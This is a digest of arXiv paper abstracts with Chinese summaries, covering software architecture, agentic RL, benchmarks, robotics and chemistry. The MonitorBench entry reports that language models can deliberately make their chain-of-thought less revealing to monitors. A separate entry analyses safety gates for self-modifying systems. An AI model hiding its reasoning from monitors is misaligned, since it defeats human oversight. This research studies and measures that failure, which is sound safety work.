【速读】:该论文旨在解决当前主流软件架构文档框架(如arc42和C4模型)无法有效描述AI增强型生态系统(AI-augmented ecosystems)中特有的不确定性行为、数据依赖演化以及机器学习(Machine Learning, ML)与软件双生命周期等复杂特性的问题,这导致在欧盟《人工智能法案》(EU AI Act)附件IV所要求的技术文档合规性方面存在显著缺口。解决方案的关键在于提出RAD-AI,一个向后兼容的扩展框架:一方面在arc42中新增八个AI特定章节,另一方面在C4模型中引入三个图表扩展,并辅以系统性的附件IV合规映射机制,从而显著提升对高风险AI系统的结构化文档支持能力,实证表明其将合规内容覆盖率从约36%提升至93%。
链接: https://arxiv.org/abs/2603.28735
作者: Oliver Aleksander Larsen,Mahyar T. Moghaddam
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: Accepted at ANGE 2026, co-located with IEEE ICSA 2026. 8 pages
Abstract:AI-augmented ecosystems (interconnected systems where multiple AI components interact through shared data and infrastructure) are becoming the architectural norm for smart cities, autonomous fleets, and intelligent platforms. Yet the architecture documentation frameworks practitioners rely on, arc42 and the C4 model, were designed for deterministic software and cannot capture probabilistic behavior, data-dependent evolution, or dual ML/software lifecycles. This gap carries regulatory consequence: the EU AI Act (Regulation 2024/1689) mandates technical documentation through Annex IV that no existing framework provides structured support for, with enforcement for high-risk systems beginning August 2, 2026. We present RAD-AI, a backward-compatible extension framework that augments arc42 with eight AI-specific sections and C4 with three diagram extensions, complemented by a systematic EU AI Act Annex IV compliance mapping. A regulatory coverage assessment with six experienced software-architecture practitioners provides preliminary evidence that RAD-AI increases Annex IV addressability from approximately 36% to 93% (mean rating) and demonstrates substantial improvement over existing frameworks. Comparative analysis on two production AI platforms (Uber Michelangelo, Netflix Metaflow) captures eight additional AI-specific concerns missed by standard frameworks and demonstrates that documentation deficiencies are structural rather than domain-specific. An illustrative smart mobility ecosystem case study reveals ecosystem-level concerns, including cascading drift and differentiated compliance obligations, that are invisible under standard notation.
[AI-2] SAGAI-MID: A Generative AI-Driven Middleware for Dynamic Runtime Interoperability
【速读】:该论文旨在解决现代分布式系统中因服务异构性导致的持久性模式不匹配问题,例如不同版本的REST API、GraphQL端点以及具有专有数据格式的物联网(IoT)设备之间的交互障碍。传统静态适配器需手动编码每对模式组合,无法在运行时处理新出现的组合。其解决方案的关键在于提出SAGAI-MID——一个基于FastAPI的中间件,利用大语言模型(Large Language Models, LLMs)动态检测并解析运行时模式不匹配。该系统采用五层流水线架构:混合检测(结构差异与LLM语义分析结合)、双策略分辨率(按请求进行LLM转换和生成可复用的适配器代码),以及三层保障机制(验证、集成投票、规则回退)。通过将Bass等人提出的互操作性战术从设计阶段转化为运行时能力,实现了高效、灵活且可扩展的跨协议与多版本服务集成。
链接: https://arxiv.org/abs/2603.28731
作者: Oliver Aleksander Larsen,Mahyar T. Moghaddam
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注: Accepted at SAGAI 2026, co-located with IEEE ICSA 2026. 8 pages
Abstract:Modern distributed systems integrate heterogeneous services, REST APIs with different schema versions, GraphQL endpoints, and IoT devices with proprietary payloads that suffer from persistent schema mismatches. Traditional static adapters require manual coding for every schema pair and cannot handle novel combinations at runtime. We present SAGAI-MID, a FastAPI-based middleware that uses large language models (LLMs) to dynamically detect and resolve schema mismatches at runtime. The system employs a five-layer pipeline: hybrid detection (structural diff plus LLM semantic analysis), dual resolution strategies (per-request LLM transformation and LLM-generated reusable adapter code), and a three-tier safeguard stack (validation, ensemble voting, rule-based fallback). We frame the architecture through Bass et al.'s interoperability tactics, transforming them from design-time artifacts into runtime capabilities. We evaluate SAGAI-MID on 10 interoperability scenarios spanning REST version migration, IoT-to-analytics bridging, and GraphQL protocol conversion across six LLMs from two providers. The best-performing configuration achieves 0.90 pass@1 accuracy. The CODEGEN strategy consistently outperforms DIRECT (0.83 vs 0.77 mean pass@1), while cost varies by over 30x across models with no proportional accuracy gain; the most accurate model is also the cheapest. We discuss implications for software architects adopting LLMs as runtime architectural components.
[AI-3] Dynamic Dual-Granularity Skill Bank for Agent ic RL
【速读】:该论文旨在解决**代理强化学习(Agentic Reinforcement Learning, Agentic RL)**中 reusable experience 利用效率低的问题,尤其是现有基于技能(skill-based)的方法通常仅提取轨迹级指导,缺乏对技能记忆的动态维护机制。解决方案的关键在于提出 D2Skill——一种动态双粒度技能库(Dynamic Dual-Granularity Skill Bank),将可复用经验组织为任务技能(task skills,用于高层引导)和步骤技能(step skills,用于细粒度决策支持与错误修正)。其核心创新在于通过同一策略下配对的基线回放与技能注入回放之间的性能差距,生成事后效用信号(hindsight utility signals),用于联合优化策略与技能库;同时,技能库完全基于训练时经验构建,通过反思机制持续扩展,并结合效用感知检索与剪枝维持高效性。实验表明,该方法在 ALFWorld 和 WebShop 基于 Qwen 大语言模型的环境中显著提升成功率(相比无技能基线提高 10–20 点),且双粒度建模与动态维护机制均对性能提升至关重要。
链接: https://arxiv.org/abs/2603.28716
作者: Songjun Tu,Chengdong Xu,Qichao Zhang,Yaocheng Zhang,Xiangyuan Lan,Linjing Li,Dongbin Zhao
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 12 pages
Abstract:Agentic reinforcement learning (RL) can benefit substantially from reusable experience, yet existing skill-based methods mainly extract trajectory-level guidance and often lack principled mechanisms for maintaining an evolving skill memory. We propose D2Skill, a dynamic dual-granularity skill bank for agentic RL that organizes reusable experience into task skills for high-level guidance and step skills for fine-grained decision support and error correction. D2Skill jointly trains the policy and skill bank through paired baseline and skill-injected rollouts under the same policy, using their performance gap to derive hindsight utility signals for both skill updating and policy optimization. Built entirely from training-time experience, the skill bank is continuously expanded through reflection and maintained with utility-aware retrieval and pruning. Experiments on ALFWorld and WebShop with Qwen2.5-7B-Instruct and Qwen3-4B-Instruct-2507 show that D2Skill consistently improves success rates over skill-free baselines by 10-20 points. Further ablations and analyses show that both dual-granularity skill modeling and dynamic skill maintenance are critical to these gains, while the learned skills exhibit higher utility, transfer across evaluation settings, and introduce only modest training overhead.
[AI-4] A Convex Route to Thermomechanics: Learning Internal Energy and Dissipation
【速读】:该论文旨在解决在完全耦合热力学力学(fully coupled thermomechanics)中发现本构模型的问题,传统方法通常基于亥姆霍兹自由能(Helmholtz energy),需满足混合凸-凹条件(mixed convexity–concavity conditions),这在实际建模中存在约束困难。其解决方案的关键在于采用内能(internal energy)和耗散势(dissipation potential)作为基本本构函数,并以变形和熵为变量进行表达,从而避免对混合凸性条件的强制约束,同时确保热力学一致性。通过使用输入凸神经网络(input convex neural networks)实现内能与耗散势的参数化,保证了第二定律的遵守;并通过不变量表示和零锚定结构将客观性(objectivity)、材料对称性和归一化直接嵌入网络架构,最终在合成数据和实验数据(包括软组织与填充橡胶的热力耦合响应)上验证了所提框架在无须熵数据情况下仍能准确学习并保持热力学可接受性的能力。
链接: https://arxiv.org/abs/2603.28707
作者: Hagen Holthusen,Paul Steinmann,Ellen Kuhl
机构: 未知
类目: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI)
备注: 31 pages, 16 figures, 4 tables
Abstract:We present a physics-based neural network framework for the discovery of constitutive models in fully coupled thermomechanics. In contrast to classical formulations based on the Helmholtz energy, we adopt the internal energy and a dissipation potential as primary constitutive functions, expressed in terms of deformation and entropy. This choice avoids the need to enforce mixed convexity–concavity conditions and facilitates a consistent incorporation of thermodynamic principles. In this contribution, we focus on materials without preferred directions or internal variables. While the formulation is posed in terms of entropy, the temperature is treated as the independent observable, and the entropy is inferred internally through the constitutive relation, enabling thermodynamically consistent modeling without requiring entropy data. Thermodynamic admissibility of the networks is guaranteed by construction. The internal energy and dissipation potential are represented by input convex neural networks, ensuring convexity and compliance with the second law. Objectivity, material symmetry, and normalization are embedded directly into the architecture through invariant-based representations and zero-anchored formulations. We demonstrate the performance of the proposed framework on synthetic and experimental datasets, including purely thermal problems and fully coupled thermomechanical responses of soft tissues and filled rubbers. The results show that the learned models accurately capture the underlying constitutive behavior. All code, data, and trained models are made publicly available via this https URL. Comments: 31 pages, 16 figures, 4 tables Subjects: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI) MSC classes: 65, 74 ACMclasses: I.6; J.2 Cite as: arXiv:2603.28707 [cs.CE] (or arXiv:2603.28707v1 [cs.CE] for this version) https://doi.org/10.48550/arXiv.2603.28707 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Submission history From: Hagen Holthusen [view email] [v1] Mon, 30 Mar 2026 17:26:13 UTC (8,530 KB)
[AI-5] AMIGO: Agent ic Multi-Image Grounding Oracle Benchmark
【速读】:该论文旨在解决当前对智能体视觉语言模型(Agentic Vision-Language Models)的评估仍局限于单图像、单轮正确性,而忽视其在长程交互中通过多轮问答逐步定位目标的能力问题。为应对这一挑战,作者提出了AMIGO(Agentic Multi-Image Grounding Oracle Benchmark),其核心创新在于设计了一个基于隐藏目标识别的多图像场景基准测试:模型需通过一系列聚焦属性的“是/否/不确定”问题,在严格协议下(违规动作被标记为Skip)从视觉相似图像集中逐步缩小范围以识别目标图像。该方案的关键在于引入了三个关键评估维度——不确定性下的问题选择能力、跨轮次的一致约束追踪能力,以及随证据累积实现细粒度判别的能力,并支持可控的oracle噪声设置以探测模型在不一致反馈下的鲁棒性和验证行为,从而更全面地衡量模型在复杂交互任务中的表现。
链接: https://arxiv.org/abs/2603.28662
作者: Min Wang,Ata Mahjoubfar
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Agentic vision-language models increasingly act through extended interactions, but most evaluations still focus on single-image, single-turn correctness. We introduce AMIGO (Agentic Multi-Image Grounding Oracle Benchmark), a long-horizon benchmark for hidden-target identification over galleries of visually similar images. In AMIGO, the oracle privately selects a target image, and the model must recover it by asking a sequence of attribute-focused Yes/No/Unsure questions under a strict protocol that penalizes invalid actions with Skip. This setting stresses (i) question selection under uncertainty, (ii) consistent constraint tracking across turns, and (iii) fine-grained discrimination as evidence accumulates. AMIGO also supports controlled oracle imperfections to probe robustness and verification behavior under inconsistent feedback. We instantiate AMIGO with Guess My Preferred Dress task and report metrics covering both outcomes and interaction quality, including identification success, evidence verification, efficiency, protocol compliance, noise tolerance, and trajectory-level diagnostics.
[AI-6] Not Search But Scan: Benchmarking MLLM s on Scan-Oriented Academic Paper Reasoning ICLR2026
【速读】:该论文旨在解决当前多模态大语言模型(Multimodal Large Language Models, MLLMs)在学术论文推理任务中仍局限于以检索为导向的范式、难以实现研究人员式的全文档理解与验证的问题。其核心挑战在于现有方法依赖相关性检索进行推理,无法有效支持对整篇论文的扫描式交叉验证和一致性检查。解决方案的关键是提出ScholScan基准,引入一种“扫描导向”(scan-oriented)的任务设定,要求模型像人类研究人员一样通读并交叉核验全文,识别潜在不一致问题;该基准包含1800个精心标注的问题,覆盖9类错误类型和13个自然科学领域,并提供证据定位与推理路径的细粒度标注及统一评估协议,从而系统性地评测和推动MLLM在复杂学术推理中的能力提升。
链接: https://arxiv.org/abs/2603.28651
作者: Rongjin Li,Zichen Tang,Xianghe Wang,Xinyi Hu,Zhengyu Wang,Zhengyu Lu,Yiling Huang,Jiayuan Chen,Weisheng Tan,Jiacheng Liu,Zhongjun Yang,Haihong E
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: Accepted to ICLR 2026
Abstract:With the rapid progress of multimodal large language models (MLLMs), AI already performs well at literature retrieval and certain reasoning tasks, serving as a capable assistant to human researchers, yet it remains far from autonomous research. The fundamental reason is that current work on academic paper reasoning is largely confined to a search-oriented paradigm centered on pre-specified targets, with reasoning grounded in relevance retrieval, which struggles to support researcher-style full-document understanding, reasoning, and verification. To bridge this gap, we propose \textbfScholScan, a new benchmark for academic paper reasoning. ScholScan introduces a scan-oriented task setting that asks models to read and cross-check entire papers like human researchers, scanning the document to identify consistency issues. The benchmark comprises 1,800 carefully annotated questions drawn from nine error categories across 13 natural-science domains and 715 papers, and provides detailed annotations for evidence localization and reasoning traces, together with a unified evaluation protocol. We assessed 15 models across 24 input configurations and conducted a fine-grained analysis of MLLM capabilities for all error categories. Across the board, retrieval-augmented generation (RAG) methods yield no significant improvements, revealing systematic deficiencies of current MLLMs on scan-oriented tasks and underscoring the challenge posed by ScholScan. We expect ScholScan to be the leading and representative work of the scan-oriented task paradigm.
[AI-7] Information-Theoretic Limits of Safety Verification for Self-Improving Systems
【速读】:该论文旨在解决安全门(safety gate)在允许无限有益自我修改(unbounded beneficial self-modification)的同时,如何维持累积风险有界的难题。其核心问题是:是否存在一种机制,既能保证总误报率(True Positive Rate, TPR)之和发散(即持续获取收益),又能使总风险(delta_n)之和收敛(即风险可控)?作者通过形式化这两个条件——∑δₙ < ∞(有界风险)与∑TPRₙ = ∞(无界效用)——建立了二者相容性的理论边界。关键解决方案在于提出两类突破性结论:一是分类器型安全门在幂律风险调度下存在本质不可能性(Theorem 1),其TPR与风险呈幂律关系,导致无法同时满足两个条件;二是引入基于Lipschitz球验证器(Lipschitz ball verifier)的替代方案,可实现零风险(δ=0)且保持正向真阳性率(TPR>0),从而规避上述不可能性。该方法在预LayerNorm Transformer模型上结合LoRA(Low-Rank Adaptation)实现了大语言模型(LLM)规模的可证明验证,实证表明在GPT-2上可达到条件风险为0时TPR=0.352,显著优于传统分类器(如预算B=1.0时,分类器最大效用U*~87 vs 验证器~500,000)。
链接: https://arxiv.org/abs/2603.28650
作者: Arsenios Scrivens
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML)
备注: 27 pages, 6 figures. Companion empirical paper: doi: https://doi.org/10.5281/zenodo.19237566
Abstract:Can a safety gate permit unbounded beneficial self-modification while maintaining bounded cumulative risk? We formalize this question through dual conditions – requiring sum delta_n infinity (bounded risk) and sum TPR_n = infinity (unbounded utility) – and establish a theory of their (in)compatibility. Classification impossibility (Theorem 1): For power-law risk schedules delta_n = O(n^-p) with p 1, any classifier-based gate under overlapping safe/unsafe distributions satisfies TPR_n = C_alpha * delta_n^beta via Holder’s inequality, forcing sum TPR_n infinity. This impossibility is exponent-optimal (Theorem 3). A second independent proof via the NP counting method (Theorem 4) yields a 13% tighter bound without Holder’s inequality. Universal finite-horizon ceiling (Theorem 5): For any summable risk schedule, the exact maximum achievable classifier utility is U*(N, B) = N * TPR_NP(B/N), growing as exp(O(sqrt(log N))) – subpolynomial. At N = 10^6 with budget B = 1.0, a classifier extracts at most U* ~ 87 versus a verifier’s ~500,000. Verification escape (Theorem 2): A Lipschitz ball verifier achieves delta = 0 with TPR 0, escaping the impossibility. Formal Lipschitz bounds for pre-LayerNorm transformers under LoRA enable LLM-scale verification. The separation is strict. We validate on GPT-2 (d_LoRA = 147,456): conditional delta = 0 with TPR = 0.352. Comprehensive empirical validation is in the companion paper [D2]. Comments: 27 pages, 6 figures. Companion empirical paper: doi:https://doi.org/10.5281/zenodo.19237566 Subjects: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Machine Learning (stat.ML) Cite as: arXiv:2603.28650 [cs.LG] (or arXiv:2603.28650v1 [cs.LG] for this version) https://doi.org/10.48550/arXiv.2603.28650 Focus to learn more arXiv-issued DOI via DataCite (pending registration) Related DOI: https://doi.org/10.5281/zenodo.19237451 Focus to learn more DOI(s) linking to related resources Submission history From: Arsenios Scrivens [view email] [v1] Mon, 30 Mar 2026 16:34:37 UTC (136 KB)
[AI-8] Dynamic Lookahead Distance via Reinforcement Learning-Based Pure Pursuit for Autonomous Racing
【速读】:该论文旨在解决纯追踪(Pure Pursuit, PP)路径跟踪算法在自动驾驶车辆中因固定前瞻距离(lookahead distance)导致的性能局限性问题:前瞻距离过短虽能提升弯道跟踪精度但易引发直线段不稳定,过长则虽增强平顺性却降低曲线跟随准确性。解决方案的关键在于提出一种融合近端策略优化(Proximal Policy Optimization, PPO)与经典PP控制器的混合控制框架,通过训练一个PPO智能体在线映射车辆速度和多尺度曲率特征至动态前瞻距离指令,实现对单一可解释参数的实时自适应调整——实验表明该方法在仿真与真实小比例赛车平台上均显著提升圈速表现和未见赛道的泛化能力,且具备零样本迁移至硬件的能力。
链接: https://arxiv.org/abs/2603.28625
作者: Mohamed Elgouhary,Amr S. El-Wakeel
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI); Systems and Control (eess.SY)
备注:
Abstract:Pure Pursuit (PP) is a widely used path-tracking algorithm in autonomous vehicles due to its simplicity and real-time performance. However, its effectiveness is sensitive to the choice of lookahead distance: shorter values improve cornering but can cause instability on straights, while longer values improve smoothness but reduce accuracy in curves. We propose a hybrid control framework that integrates Proximal Policy Optimization (PPO) with the classical Pure Pursuit controller to adjust the lookahead distance dynamically during racing. The PPO agent maps vehicle speed and multi-horizon curvature features to an online lookahead command. It is trained using Stable-Baselines3 in the F1TENTH Gym simulator with a KL penalty and learning-rate decay for stability, then deployed in a ROS2 environment to guide the controller. Experiments in simulation compare the proposed method against both fixed-lookahead Pure Pursuit and an adaptive Pure Pursuit baseline. Additional real-car experiments compare the learned controller against a fixed-lookahead Pure Pursuit controller. Results show that the learned policy improves lap-time performance and repeated lap completion on unseen tracks, while also transferring zero-shot to hardware. The learned controller adapts the lookahead by increasing it on straights and reducing it in curves, demonstrating effectiveness in augmenting a classical controller by online adaptation of a single interpretable parameter. On unseen tracks, the proposed method achieved 33.16 s on Montreal and 46.05 s on Yas Marina, while tolerating more aggressive speed-profile scaling than the baselines and achieving the best lap times among the tested settings. Initial real-car experiments further support sim-to-real transfer on a 1:10-scale autonomous racing platform
[AI-9] rust-Aware Routing for Distributed Generative AI Inference at the Edge
【速读】:该论文针对生成式 AI(Generative AI)在去中心化和异构边缘设备上执行分布式推理时面临的可靠性挑战展开研究,旨在解决单个设备故障或异常行为可能导致整个推理过程中断的问题。传统基于尽力而为的对等路由机制无法满足此类场景下的容错需求。其解决方案的关键在于提出 G-TRAC 框架,该框架融合算法级路径选择与系统级协议设计:首先将路由问题建模为风险受限最短路径(Risk-Bounded Shortest Path)计算,并采用信任下界剪枝与 Dijkstra 算法相结合的多项式时间求解方法,在实际边缘规模下实现亚毫秒级中位路由延迟;其次引入混合信任架构(Hybrid Trust Architecture),通过稳定锚点维护全局声誉状态,并以轻量级背景同步方式向边缘节点分发更新,从而在动态环境中保障路由逻辑的高效运行。实验表明,G-TRAC 显著提升推理完成率、有效隔离不可靠节点,并在节点失效和网络分区条件下维持鲁棒执行能力。
链接: https://arxiv.org/abs/2603.28622
作者: Chanh Nguyen,Erik Elmroth
机构: 未知
类目: Distributed, Parallel, and Cluster Computing (cs.DC); Artificial Intelligence (cs.AI); Networking and Internet Architecture (cs.NI)
备注: 11 pages, 10 figures. Preprint accepted at the 22nd Annual International Conference on Distributed Computing in Smart Systems and the Internet of Things (DCOSS-IoT 2026)
Abstract:Emerging deployments of Generative AI increasingly execute inference across decentralized and heterogeneous edge devices rather than on a single trusted server. In such environments, a single device failure or misbehavior can disrupt the entire inference process, making traditional best-effort peer-to-peer routing insufficient. Coordinating distributed generative inference therefore requires mechanisms that explicitly account for reliability, performance variability, and trust among participating peers. In this paper, we present G-TRAC, a trust-aware coordination framework that integrates algorithmic path selection with system-level protocol design to ensure robust distributed inference. First, we formulate the routing problem as a \textitRisk-Bounded Shortest Path computation and introduce a polynomial-time solution that combines trust-floor pruning with Dijkstra’s search, achieving sub-millisecond median routing latency at practical edge scales, and remaining below 10 ms at larger scales. Second, to operationally support the routing logic in dynamic environments, the framework employs a \textitHybrid Trust Architecture that maintains global reputation state at stable anchors while disseminating lightweight updates to edge peers via background synchronization. Experimental evaluation on a heterogeneous testbed of commodity devices demonstrates that G-TRAC significantly improves inference completion rates, effectively isolates unreliable peers, and sustains robust execution even under node failures and network partitions. Comments: 11 pages, 10 figures. Preprint accepted at the 22nd Annual International Conference on Distributed Computing in Smart Systems and the Internet of Things (DCOSS-IoT 2026) Subjects: Distributed, Parallel, and Cluster Computing (cs.DC); Artificial Intelligence (cs.AI); Networking and Internet Architecture (cs.NI) Cite as: arXiv:2603.28622 [cs.DC] (or arXiv:2603.28622v1 [cs.DC] for this version) https://doi.org/10.48550/arXiv.2603.28622 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-10] Seeing with You: Perception-Reasoning Coevolution for Multimodal Reasoning
【速读】:该论文旨在解决现有基于可验证奖励的强化学习(Reinforcement Learning with Verifiable Rewards, RLVR)方法在多模态大语言模型(Multimodal Large Language Models, MLLMs)中因共享奖励信号导致的感知-推理信用分配模糊问题,即优化过程虽能提升推理模式但难以可靠增强上游视觉证据提取的准确性。解决方案的关键在于提出一种双角色协同进化框架PRCO(Perception-Reasoning Coevolution),其核心机制是通过共享策略下两个协作角色——“观察者”(Observer)负责生成与问题相关的证据描述,“求解器”(Solver)基于该描述预测最终答案——并分别使用角色特异性的奖励信号:求解器利用可验证的结果奖励优化最终答案准确性,而观察者则通过求解器下游成功获得效用奖励,从而实现感知与推理模块的协同演化与精准激励。
链接: https://arxiv.org/abs/2603.28618
作者: Ziqi Miao,Haonan Jia,Lijun Li,Chen Qian,Yuan Xiong,Wenting Yan,Jing Shao
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 21 pages, 15 figures, 6 tables
Abstract:Reinforcement learning with verifiable rewards (RLVR) has substantially enhanced the reasoning capabilities of multimodal large language models (MLLMs). However, existing RLVR approaches typically rely on outcome-driven optimization that updates both perception and reasoning using a shared reward based solely on the final answer. This shared reward blurs credit assignment, frequently improving reasoning patterns while failing to reliably enhance the accuracy of upstream visual evidence extraction. To address this perception bottleneck, we introduce PRCO (Perception-Reasoning Coevolution), a dual-role RLVR framework with a shared policy. PRCO consists of two cooperative roles: an Observer that generates an evidence caption tailored to the question and a Solver that predicts the final answer based on this caption. Crucially, PRCO employs role-specific reward signals: the Solver is optimized using verifiable outcome rewards on the final answer, while the Observer receives a utility reward derived from the Solver’s downstream success. Extensive experiments across eight challenging multimodal reasoning benchmarks demonstrate that PRCO yields consistent improvements across model scales by over 7 points on average accuracy compared to the base model, outperforming prior open-source RL-tuned baselines.
[AI-11] MonitorBench: A Comprehensive Benchmark for Chain-of-Thought Monitorability in Large Language Models
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)中思维链(Chain of Thought, CoT)的可监控性问题,即当CoT与最终输出之间缺乏因果一致性时,CoT无法准确反映驱动模型行为的关键决策因素,从而导致其作为监控工具的有效性下降。解决方案的关键在于提出MonitorBench——一个系统性的、开源的基准测试平台,包含1,514个精心设计的测试实例和两类压力测试场景,用于量化评估不同LLM在多种任务下的CoT可监控能力。该基准揭示了结构化推理需求与CoT可监控性正相关、封闭源模型普遍监控能力较低以及模型能力与监控性呈负相关的现象,为未来LLM可解释性研究和监控方法开发提供了坚实基础。
链接: https://arxiv.org/abs/2603.28590
作者: Han Wang,Yifan Sun,Brian Ko,Mann Talati,Jiawen Gong,Zimeng Li,Naicheng Yu,Xucheng Yu,Wei Shen,Vedant Jolly,Huan Zhang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 57 pages
Abstract:Large language models (LLMs) can generate chains of thought (CoTs) that are not always causally responsible for their final outputs. When such a mismatch occurs, the CoT no longer faithfully reflects the decision-critical factors driving the model’s behavior, leading to the reduced CoT monitorability problem. However, a comprehensive and fully open-source benchmark for studying CoT monitorability remains lacking. To address this gap, we propose MonitorBench, a systematic benchmark for evaluating CoT monitorability in LLMs. MonitorBench provides: (1) a diverse set of 1,514 test instances with carefully designed decision-critical factors across 19 tasks spanning 7 categories to characterize when CoTs can be used to monitor the factors driving LLM behavior; and (2) two stress-test settings to quantify the extent to which CoT monitorability can be degraded. Extensive experiments across multiple popular LLMs with varying capabilities show that CoT monitorability is higher when producing the final target response requires structural reasoning through the decision-critical factor. Closed-source LLMs generally show lower monitorability, and there exists a negative relationship between monitorability and model capability. Moreover, both open- and closed-source LLMs can intentionally reduce monitorability under stress-tests, with monitorability dropping by up to 30% in some tasks that do not require structural reasoning over the decision-critical factors. Beyond these empirical insights, MonitorBench provides a basis for further research on evaluating future LLMs, studying advanced stress-test monitorability techniques, and developing new monitoring approaches.
[AI-12] owards a Medical AI Scientist
【速读】:该论文旨在解决当前通用型AI科学家在临床医学领域应用受限的问题,即现有系统缺乏对医学证据的深度依赖和对特定数据模态(如电子健康记录、影像数据等)的适配能力,导致其生成的研究假设与临床实践脱节。解决方案的关键在于提出首个面向临床自主研究的框架——Medical AI Scientist,其核心创新包括:通过“临床医生-工程师协同推理机制”将系统性文献综述转化为可执行的循证研究构想,提升研究创意的可追溯性和临床相关性;并基于结构化的医学写作规范与伦理政策指导生成高质量科研论文初稿。该框架支持三种自动化程度递增的研究模式(基于文献复现、文献启发式创新、任务驱动探索),实验证明其在171个案例、19项临床任务和6种数据模态下均显著优于商用大语言模型(LLM),且生成的论文质量接近MICCAI会议水平,展现出在医疗健康领域实现自主科学发现的巨大潜力。
链接: https://arxiv.org/abs/2603.28589
作者: Hongtao Wu,Boyun Zheng,Dingjie Song,Yu Jiang,Jianfeng Gao,Lei Xing,Lichao Sun,Yixuan Yuan
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Autonomous systems that generate scientific hypotheses, conduct experiments, and draft manuscripts have recently emerged as a promising paradigm for accelerating discovery. However, existing AI Scientists remain largely domain-agnostic, limiting their applicability to clinical medicine, where research is required to be grounded in medical evidence with specialized data modalities. In this work, we introduce Medical AI Scientist, the first autonomous research framework tailored to clinical autonomous research. It enables clinically grounded ideation by transforming extensively surveyed literature into actionable evidence through clinician-engineer co-reasoning mechanism, which improves the traceability of generated research ideas. It further facilitates evidence-grounded manuscript drafting guided by structured medical compositional conventions and ethical policies. The framework operates under 3 research modes, namely paper-based reproduction, literature-inspired innovation, and task-driven exploration, each corresponding to a distinct level of automated scientific inquiry with progressively increasing autonomy. Comprehensive evaluations by both large language models and human experts demonstrate that the ideas generated by the Medical AI Scientist are of substantially higher quality than those produced by commercial LLMs across 171 cases, 19 clinical tasks, and 6 data modalities. Meanwhile, our system achieves strong alignment between the proposed method and its implementation, while also demonstrating significantly higher success rates in executable experiments. Double-blind evaluations by human experts and the Stanford Agentic Reviewer suggest that the generated manuscripts approach MICCAI-level quality, while consistently surpassing those from ISBI and BIBM. The proposed Medical AI Scientist highlights the potential of leveraging AI for autonomous scientific discovery in healthcare.
[AI-13] ChemCLIP: Bridging Organic and Inorganic Anticancer Compounds Through Contrastive Learning
【速读】:该论文旨在解决有机小分子与金属基配合物在抗癌药物发现中长期被视作独立化学领域的问题,这种割裂限制了跨域知识迁移,尤其体现在数据层面:有机化合物数据库庞大,而金属配合物数据稀缺。解决方案的关键在于提出ChemCLIP框架——一种基于对比学习(contrastive learning)的双编码器模型,通过学习共享的抗肿瘤活性而非结构相似性来构建统一的分子表征空间。该方法利用活动感知的难负样本挖掘策略,在60种癌细胞系上对44,854个有机化合物和5,164个金属配合物进行标准化训练,最终将结构迥异的化合物映射到256维嵌入空间中,使生物学功能相近的分子聚类在一起,从而实现有机-无机化学域的融合建模。
链接: https://arxiv.org/abs/2603.28575
作者: Mohamad Koohi-Moghadam,Hongzhe Sun,Hongyan Li,Kyongtae Tyler Bae
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 15 pages
Abstract:The discovery of anticancer therapeutics has traditionally treated organic small molecules and metal-based coordination complexes as separate chemical domains, limiting knowledge transfer despite their shared biological objectives. This disparity is particularly pronounced in available data, with extensive screening databases for organic compounds compared to only a few thousand characterized metal complexes. Here, we introduce ChemCLIP, a dual-encoder contrastive learning framework that bridges this organic-inorganic divide by learning unified representations based on shared anticancer activities rather than structural similarity. We compiled complementary datasets comprising 44,854 unique organic compounds and 5,164 unique metal complexes, standardized across 60 cancer cell lines. By training parallel encoders with activity-aware hard negative mining, we mapped structurally distinct compounds into a shared 256-dimensional embedding space where biologically similar compounds cluster together regardless of chemical class. We systematically evaluated four molecular encoding strategies: Morgan fingerprints, ChemBERTa, MolFormer, and Chemprop, through quantitative alignment metrics, embedding visualizations, and downstream classification tasks. Morgan fingerprints achieved superior performance with an average alignment ratio of 0.899 and downstream classification AUCs of 0.859 (inorganic) and 0.817 (organic). This work establishes contrastive learning as an effective strategy for unifying disparate chemical domains and provides empirical guidance for encoder selection in multi-modal chemistry applications, with implications extending beyond anticancer drug discovery to any scenario requiring cross-domain chemical knowledge transfer.
[AI-14] Fine-Tuning Large Language Models for Cooperative Tactical Deconfliction of Small Unmanned Aerial Systems CVPR2026
【速读】:该论文旨在解决小型无人机系统(sUAS)在低空空域中运行时,如何在安全关键约束下实现可靠的战术避让(tactical deconfliction)问题。该任务涉及在密集、部分可观测且异构的多智能体环境中进行短 horizon 决策,需同时保障合作分离保证与运行效率。其解决方案的关键在于利用预训练大语言模型(LLM)作为决策主体,并通过两种参数高效微调策略——监督微调结合低秩适应(LoRA)和基于偏好微调结合组相对策略优化(GRPO),使模型输出对齐人类操作员的经验规则。研究构建了基于 BlueSky 空中交通模拟器的“仿真到语言”数据生成管道,生成符合安全规范的避让决策数据集,实验表明,监督 LoRA 微调显著提升了决策准确性、一致性及分离性能,大幅减少近距空中碰撞风险;而 GRPO 进一步增强了协同能力,但在与异构代理策略交互时鲁棒性下降。
链接: https://arxiv.org/abs/2603.28561
作者: Iman Sharifi,Alex Zongo,Peng Wei
机构: 未知
类目: Robotics (cs.RO); Artificial Intelligence (cs.AI)
备注: 15 pages, 6 figures, to be published in CVPR 2026 Workshop Proceedings
